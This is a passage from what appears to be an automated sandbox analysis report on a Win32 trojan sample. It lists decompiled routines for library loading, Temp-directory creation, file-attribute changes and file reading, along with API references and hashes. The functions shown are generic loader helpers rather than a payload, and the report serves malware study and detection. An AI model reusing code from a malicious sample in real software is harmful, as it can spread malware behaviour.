                                                          				 *(_t34 - 4) = 1;
                                                          				if(__eflags < 0) {
                                                          					_push(0xffffffe7);
                                                          					L15:
                                                          					E00401423();
                                                          					L16:
                                                          					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
                                                          					return 0;
                                                          				}
                                                          				_t32 = E00402BCE(0xfffffff0);
                                                          				 *(_t34 + 8) = E00402BCE(1);
                                                          				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                          					L3:
                                                          					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                          					_t30 = _t18;
                                                          					if(_t30 == _t27) {
                                                          						_push(0xfffffff6);
                                                          						goto L15;
                                                          					}
                                                          					L4:
                                                          					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                          					if(_t33 == _t27) {
                                                          						E00405374(0xfffffff7,  *(_t34 + 8));
                                                          					} else {
                                                          						 *(_t34 - 4) = _t27;
                                                          						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                          							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
                                                          						} else {
                                                          							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                          							if( *_t33() != 0) {
                                                          								 *(_t34 - 4) = 1;
                                                          							}
                                                          						}
                                                          					}
                                                          					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
                                                          						FreeLibrary(_t30);
                                                          					}
                                                          					goto L16;
                                                          				}
                                                          				_t26 = GetModuleHandleA(_t32); // executed
                                                          				_t30 = _t26;
                                                          				if(_t30 != __ebx) {
                                                          					goto L4;
                                                          				}
                                                          				goto L3;
                                                          			}










                                                          0x0040209d
                                                          0x0040209d
                                                          0x004020a2
                                                          0x004020a9
                                                          0x00402164
                                                          0x004022dd
                                                          0x004022dd
                                                          0x00402a5a
                                                          0x00402a5d
                                                          0x00402a69
                                                          0x00402a69
                                                          0x004020b8
                                                          0x004020c2
                                                          0x004020c5
                                                          0x004020d4
                                                          0x004020d8
                                                          0x004020de
                                                          0x004020e2
                                                          0x0040215d
                                                          0x00000000
                                                          0x0040215d
                                                          0x004020e4
                                                          0x004020ed
                                                          0x004020f1
                                                          0x00402135
                                                          0x004020f3
                                                          0x004020f6
                                                          0x004020f9
                                                          0x00402129
                                                          0x004020fb
                                                          0x004020fe
                                                          0x00402107
                                                          0x00402109
                                                          0x00402109
                                                          0x00402107
                                                          0x004020f9
                                                          0x0040213d
                                                          0x00402152
                                                          0x00402152
                                                          0x00000000
                                                          0x0040213d
                                                          0x004020c8
                                                          0x004020ce
                                                          0x004020d2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2987980305-0
                                                          • Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                          • Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
                                                          • Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                          • Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E004015BB(char __ebx, void* __eflags) {
                                                          				void* _t13;
                                                          				int _t19;
                                                          				char _t21;
                                                          				void* _t22;
                                                          				char _t23;
                                                          				signed char _t24;
                                                          				char _t26;
                                                          				CHAR* _t28;
                                                          				char* _t32;
                                                          				void* _t33;
                                                          
                                                          				_t26 = __ebx;
                                                          				_t28 = E00402BCE(0xfffffff0);
                                                          				_t13 = E00405C7E(_t28);
                                                          				_t30 = _t13;
                                                          				if(_t13 != __ebx) {
                                                          					do {
                                                          						_t32 = E00405C10(_t30, 0x5c);
                                                          						_t21 =  *_t32;
                                                          						 *_t32 = _t26;
                                                          						 *((char*)(_t33 + 0xb)) = _t21;
                                                          						if(_t21 != _t26) {
                                                          							L5:
                                                          							_t22 = E004058B7(_t28);
                                                          						} else {
                                                          							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                          							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
                                                          								goto L5;
                                                          							} else {
                                                          								_t22 = E0040583A(_t28); // executed
                                                          							}
                                                          						}
                                                          						if(_t22 != _t26) {
                                                          							if(_t22 != 0xb7) {
                                                          								L9:
                                                          								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                          							} else {
                                                          								_t24 = GetFileAttributesA(_t28); // executed
                                                          								if((_t24 & 0x00000010) == 0) {
                                                          									goto L9;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                          						 *_t32 = _t23;
                                                          						_t30 = _t32 + 1;
                                                          					} while (_t23 != _t26);
                                                          				}
                                                          				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                          					_push(0xfffffff5);
                                                          					E00401423();
                                                          				} else {
                                                          					E00401423(0xffffffe6);
                                                          					E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t28);
                                                          					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                          					if(_t19 == 0) {
                                                          						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                          					}
                                                          				}
                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
                                                          				return 0;
                                                          			}













                                                          0x004015bb
                                                          0x004015c2
                                                          0x004015c5
                                                          0x004015ca
                                                          0x004015ce
                                                          0x004015d0
                                                          0x004015d8
                                                          0x004015da
                                                          0x004015dc
                                                          0x004015e0
                                                          0x004015e3
                                                          0x004015fb
                                                          0x004015fc
                                                          0x004015e5
                                                          0x004015e5
                                                          0x004015e8
                                                          0x00000000
                                                          0x004015f3
                                                          0x004015f4
                                                          0x004015f4
                                                          0x004015e8
                                                          0x00401603
                                                          0x0040160a
                                                          0x00401617
                                                          0x00401617
                                                          0x0040160c
                                                          0x0040160d
                                                          0x00401615
                                                          0x00000000
                                                          0x00000000
                                                          0x00401615
                                                          0x0040160a
                                                          0x0040161a
                                                          0x0040161d
                                                          0x0040161f
                                                          0x00401620
                                                          0x004015d0
                                                          0x00401627
                                                          0x00401652
                                                          0x004022dd
                                                          0x00401629
                                                          0x0040162b
                                                          0x00401636
                                                          0x0040163c
                                                          0x00401644
                                                          0x0040164a
                                                          0x0040164a
                                                          0x00401644
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                            • Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,74B5FA90,?,74B5F560,00405A35,?,74B5FA90,74B5F560,00000000), ref: 00405C8C
                                                            • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
                                                            • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5
                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                            • Part of subcall function 0040583A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 1892508949-501415292
                                                          • Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                          • Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
                                                          • Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                          • Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                          				long _v8;
                                                          				long _t21;
                                                          				long _t22;
                                                          				void* _t24;
                                                          				long _t26;
                                                          				int _t27;
                                                          				long _t28;
                                                          				void* _t30;
                                                          				long _t31;
                                                          				long _t32;
                                                          				long _t36;
                                                          
                                                          				_t21 = _a4;
                                                          				if(_t21 >= 0) {
                                                          					_t32 = _t21 +  *0x42f4b8;
                                                          					 *0x429464 = _t32;
                                                          					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                          				}
                                                          				_t22 = E004032BF(4);
                                                          				if(_t22 >= 0) {
                                                          					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
                                                          					if(_t24 == 0) {
                                                          						L18:
                                                          						_push(0xfffffffd);
                                                          						goto L19;
                                                          					} else {
                                                          						 *0x429464 =  *0x429464 + 4;
                                                          						_t36 = E004032BF(_a4);
                                                          						if(_t36 < 0) {
                                                          							L21:
                                                          							_t22 = _t36;
                                                          						} else {
                                                          							if(_a12 != 0) {
                                                          								_t26 = _a4;
                                                          								if(_t26 >= _a16) {
                                                          									_t26 = _a16;
                                                          								}
                                                          								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                          								if(_t27 != 0) {
                                                          									_t36 = _v8;
                                                          									 *0x429464 =  *0x429464 + _t36;
                                                          									goto L21;
                                                          								} else {
                                                          									goto L18;
                                                          								}
                                                          							} else {
                                                          								if(_a4 <= 0) {
                                                          									goto L21;
                                                          								} else {
                                                          									while(1) {
                                                          										_t28 = _a4;
                                                          										if(_a4 >= 0x4000) {
                                                          											_t28 = 0x4000;
                                                          										}
                                                          										_v8 = _t28;
                                                          										if(E00405E5E( *0x40a01c, 0x41d460, _t28) == 0) {
                                                          											goto L18;
                                                          										}
                                                          										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
                                                          										if(_t30 == 0) {
                                                          											_push(0xfffffffe);
                                                          											L19:
                                                          											_pop(_t22);
                                                          										} else {
                                                          											_t31 = _v8;
                                                          											_a4 = _a4 - _t31;
                                                          											 *0x429464 =  *0x429464 + _t31;
                                                          											_t36 = _t36 + _t31;
                                                          											if(_a4 > 0) {
                                                          												continue;
                                                          											} else {
                                                          												goto L21;
                                                          											}
                                                          										}
                                                          										goto L22;
                                                          									}
                                                          									goto L18;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				L22:
                                                          				return _t22;
                                                          			}














                                                          0x004031bb
                                                          0x004031c4
                                                          0x004031cd
                                                          0x004031d1
                                                          0x004031dc
                                                          0x004031dc
                                                          0x004031e4
                                                          0x004031eb
                                                          0x004031fd
                                                          0x00403204
                                                          0x004032a9
                                                          0x004032a9
                                                          0x00000000
                                                          0x0040320a
                                                          0x0040320d
                                                          0x00403219
                                                          0x0040321d
                                                          0x004032b7
                                                          0x004032b7
                                                          0x00403223
                                                          0x00403226
                                                          0x00403285
                                                          0x0040328b
                                                          0x0040328d
                                                          0x0040328d
                                                          0x0040329f
                                                          0x004032a7
                                                          0x004032ae
                                                          0x004032b1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403228
                                                          0x0040322b
                                                          0x00000000
                                                          0x00403231
                                                          0x00403236
                                                          0x0040323d
                                                          0x00403240
                                                          0x00403242
                                                          0x00403242
                                                          0x0040324f
                                                          0x00403259
                                                          0x00000000
                                                          0x00000000
                                                          0x00403262
                                                          0x00403269
                                                          0x00403281
                                                          0x004032ab
                                                          0x004032ab
                                                          0x0040326b
                                                          0x0040326b
                                                          0x0040326e
                                                          0x00403271
                                                          0x00403277
                                                          0x0040327d
                                                          0x00000000
                                                          0x0040327f
                                                          0x00000000
                                                          0x0040327f
                                                          0x0040327d
                                                          0x00000000
                                                          0x00403269
                                                          0x00000000
                                                          0x00403236
                                                          0x0040322b
                                                          0x00403226
                                                          0x0040321d
                                                          0x00403204
                                                          0x004032b9
                                                          0x004032bc

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                          • Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
                                                          • Opcode Fuzzy Hash: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                          • Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 59%
                                                          			E00401389(signed int _a4) {
                                                          				intOrPtr* _t6;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          				signed int _t11;
                                                          				void* _t12;
                                                          				signed int _t16;
                                                          				signed int _t17;
                                                          				void* _t18;
                                                          
                                                          				_t17 = _a4;
                                                          				while(_t17 >= 0) {
                                                          					_t6 = _t17 * 0x1c +  *0x42f490;
                                                          					if( *_t6 == 1) {
                                                          						break;
                                                          					}
                                                          					_push(_t6); // executed
                                                          					_t8 = E00401434(); // executed
                                                          					if(_t8 == 0x7fffffff) {
                                                          						return 0x7fffffff;
                                                          					}
                                                          					_t10 = E0040136D(_t8);
                                                          					if(_t10 != 0) {
                                                          						_t11 = _t10 - 1;
                                                          						_t16 = _t17;
                                                          						_t17 = _t11;
                                                          						_t12 = _t11 - _t16;
                                                          					} else {
                                                          						_t12 = _t10 + 1;
                                                          						_t17 = _t17 + 1;
                                                          					}
                                                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                          						 *0x42ec2c =  *0x42ec2c + _t12;
                                                          						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
                                                          					}
                                                          				}
                                                          				return 0;
                                                          			}











                                                          0x0040138a
                                                          0x004013fa
                                                          0x0040139b
                                                          0x004013a0
                                                          0x00000000
                                                          0x00000000
                                                          0x004013a2
                                                          0x004013a3
                                                          0x004013ad
                                                          0x00000000
                                                          0x00401404
                                                          0x004013b0
                                                          0x004013b7
                                                          0x004013bd
                                                          0x004013be
                                                          0x004013c0
                                                          0x004013c2
                                                          0x004013b9
                                                          0x004013b9
                                                          0x004013ba
                                                          0x004013ba
                                                          0x004013c9
                                                          0x004013cb
                                                          0x004013f4
                                                          0x004013f4
                                                          0x004013c9
                                                          0x00000000

                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                          • Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
                                                          • Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                          • Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00406656(signed int _a4) {
                                                          				struct HINSTANCE__* _t5;
                                                          				signed int _t10;
                                                          
                                                          				_t10 = _a4 << 3;
                                                          				_t8 =  *(_t10 + 0x40a258);
                                                          				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
                                                          				if(_t5 != 0) {
                                                          					L2:
                                                          					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
                                                          				}
                                                          				_t5 = E004065E8(_t8); // executed
                                                          				if(_t5 == 0) {
                                                          					return 0;
                                                          				}
                                                          				goto L2;
                                                          			}





                                                          0x0040665e
                                                          0x00406661
                                                          0x00406668
                                                          0x00406670
                                                          0x0040667c
                                                          0x00000000
                                                          0x00406683
                                                          0x00406673
                                                          0x0040667a
                                                          0x00000000
                                                          0x0040668b
                                                          0x00000000

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                            • Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                            • Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
                                                            • Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                          • Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
                                                          • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                          • Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E00405DE6(CHAR* _a4, long _a8, long _a12) {
                                                          				signed int _t5;
                                                          				void* _t6;
                                                          
                                                          				_t5 = GetFileAttributesA(_a4); // executed
                                                          				asm("sbb ecx, ecx");
                                                          				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                          				return _t6;
                                                          			}





                                                          0x00405dea
                                                          0x00405df7
                                                          0x00405e0c
                                                          0x00405e12

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe,80000000,00000003), ref: 00405DEA
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                          • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                                          • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                          • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405DC1(CHAR* _a4) {
                                                          				signed char _t3;
                                                          				signed char _t7;
                                                          
                                                          				_t3 = GetFileAttributesA(_a4); // executed
                                                          				_t7 = _t3;
                                                          				if(_t7 != 0xffffffff) {
                                                          					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                          				}
                                                          				return _t7;
                                                          			}





                                                          0x00405dc6
                                                          0x00405dcc
                                                          0x00405dd1
                                                          0x00405dda
                                                          0x00405dda
                                                          0x00405de3

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                          • Instruction ID: cf7f7f764d64860b039e5252603fd5f93999e207008e06c25ada038bd68c9de4
                                                          • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                          • Instruction Fuzzy Hash: 16D0C976504421AFC2112728AE0C89BBB55DB542B1702CA36FDA5A26B2DB304C569A98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004058B7(CHAR* _a4) {
                                                          				int _t2;
                                                          
                                                          				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				return 0;
                                                          			}




                                                          0x004058bd
                                                          0x004058c5
                                                          0x00000000
                                                          0x004058cb
                                                          0x00000000

                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                          • Instruction ID: 533fd4e2b3ea02dfd4e86ffada44851bb532735a7b96714f173b1300ab50f423
                                                          • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                          • Instruction Fuzzy Hash: 53C04C31214A019BE6506B319F09B177BA4AF50741F118439678AF01A1DB34846ADA6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405E5E(void* _a4, void* _a8, long _a12) {
                                                          				int _t7;
                                                          				long _t11;
                                                          
                                                          				_t11 = _a12;
                                                          				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
